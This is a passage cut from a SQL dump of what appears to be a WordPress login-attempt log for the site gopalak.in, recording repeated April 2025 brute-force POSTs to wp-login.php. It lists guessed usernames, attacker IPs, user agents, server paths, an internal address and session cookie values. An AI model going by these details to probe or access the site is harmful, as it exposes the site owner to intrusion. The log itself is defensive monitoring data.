00:00:00'),(93833,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46336\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.235.20\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744990723.2236099;s:12:\"REQUEST_TIME\";i:1744990723;}}','162.0.235.20',0,'2025-04-18 21:08:45','1970-01-01 00:00:00'),(93834,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"65036\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744991451.2912731;s:12:\"REQUEST_TIME\";i:1744991451;}}','192.34.56.148',0,'2025-04-18 21:20:53','1970-01-01 00:00:00'),(93835,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50838\";s:11:\"REMOTE_ADDR\";s:15:\"217.182.158.226\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744992183.4887991;s:12:\"REQUEST_TIME\";i:1744992183;}}','217.182.158.226',0,'2025-04-18 21:33:05','1970-01-01 00:00:00'),(93836,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33038\";s:11:\"REMOTE_ADDR\";s:13:\"47.244.50.243\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744992893.996727;s:12:\"REQUEST_TIME\";i:1744992893;}}','47.244.50.243',0,'2025-04-18 21:44:55','1970-01-01 00:00:00'),(93837,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42750\";s:11:\"REMOTE_ADDR\";s:12:\"163.61.72.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744993599.008837;s:12:\"REQUEST_TIME\";i:1744993599;}}','163.61.72.36',0,'2025-04-18 21:56:40','1970-01-01 00:00:00'),(93838,0,'a:2:{s:8:\"username\";s:7:\"wadminw\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=9ee2286aace047eff47edab28242ee77; _uid=rB8jg2gFyVumT245AzXLAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57768\";s:11:\"REMOTE_ADDR\";s:14:\"138.128.245.84\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745209692.442312;s:12:\"REQUEST_TIME\";i:1745209692;}}','138.128.245.84',0,'2025-04-21 09:58:14','1970-01-01 00:00:00'),(93839,0,'a:2:{s:8:\"username\";s:8:\"wwwadmin\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=42e1423f9852691b86d69e98d1c3228e; _uid=rB8jg2gF3G+mT245A0GOAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55352\";s:11:\"REMOTE_ADDR\";s:15:\"103.127.134.129\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745214575.71331;s:12:\"REQUEST_TIME\";i:1745214575;}}','103.127.134.129',0,'2025-04-21 11:19:37','1970-01-01 00:00:00'),(93840,0,'a:2:{s:8:\"username\";s:11:\"yanz@123457\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=693cf442a56d6e4400c97a7eae888e4d; _uid=rB8jg2gF8aimT245A0xfAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51488\";s:11:\"REMOTE_ADDR\";s:13:\"177.53.143.35\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745220008.8910999;s:12:\"REQUEST_TIME\";i:1745220008;}}','177.53.143.35',0,'2025-04-21 12:50:10','1970-01-01 00:00:00'),(93841,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=f1277f0b2432bc2eaba97f5a982e9cc9; _uid=rB8jg2gGCT6mT245A1r0Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55296\";s:11:\"REMOTE_ADDR\";s:12:\"8.218.30.127\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745226047.16133;s:12:\"REQUEST_TIME\";i:1745226047;}}','8.218.30.127',0,'2025-04-21 14:30:48','1970-01-01 00:00:00'),(93842,0,'a:2:{s:8:\"username\";s:7:\"wadminw\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42994\";s:11:\"REMOTE_ADDR\";s:15:\"172.104.232.115\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745328088.028547;s:12:\"REQUEST_TIME\";i:1745328088;}}','172.104.232.115',0,'2025-04-22 18:51:29','1970-01-01 00:00:00'),(93843,0,'a:2:{s:8:\"username\";s:8:\"wwwadmin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59096\";s:11:\"REMOTE_ADDR\";s:14:\"185.222.163.90\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745328506.785955;s:12:\"REQUEST_TIME\";i:1745328506;}}','185.222.163.90',0,'2025-04-22 18:58:28','1970-01-01 